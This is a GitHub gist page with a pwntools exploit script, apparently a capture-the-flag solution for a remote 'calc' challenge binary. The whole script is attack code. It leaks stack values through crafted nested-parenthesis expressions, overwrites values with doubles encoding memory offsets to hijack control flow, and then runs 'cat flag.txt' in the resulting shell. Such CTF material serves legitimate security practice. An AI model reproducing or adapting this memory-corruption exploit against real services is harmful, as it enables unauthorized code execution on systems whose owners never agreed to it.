Skip to content

Instantly share code, notes, and snippets.

@Lorak-mmk

Lorak-mmk/exploit_hard.py Secret

Last active Dec 28, 2020
Embed
What would you like to do?
#!/usr/bin/env python
from pwn import *
import struct
#r = remote('127.0.0.1', 1337)
r = remote('h4x.0x04.net', 31337)
#r = process(['./calc', '--hard'], env={'LD_LIBRARY_PATH': '.'})
context.terminal = ['termite', '-e']
def int_to_double(val):
return struct.unpack('d', struct.pack('Q', val))[0]
def readstack(n):
reps = 31 + n
cvar = chr(ord('a') + n)
payload = f'{cvar}={"(" * reps}+{")" * (n+7)}'
if n > 0:
beg = n
payload += f'+0*{"(" * beg}0+{")+".join([chr(ord("a") + i) for i in range(n)][::-1])}{")" * (beg - n + 1)}'
payload += ')' * (reps - (n+7))
if len(payload) > 1023:
print('PAYLOAD TOO BIG')
print('payload:', payload)
r.sendline(payload)
#gdb.attach(r, gdbscript=open('gdbscript.py'))
for i in range(0, 8):
readstack(i)
payload = f'd=d+{int_to_double(152)}'
print(payload)
r.sendline(payload)
payload = f'e=h+{int_to_double(1465638)}'
print(payload)
r.sendline(payload)
payload = f'f=h+{int_to_double(141022)}'
print(payload)
r.sendline(payload)
readstack(6)
r.sendline('cat flag.txt')
print(r.readline().decode().strip())
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment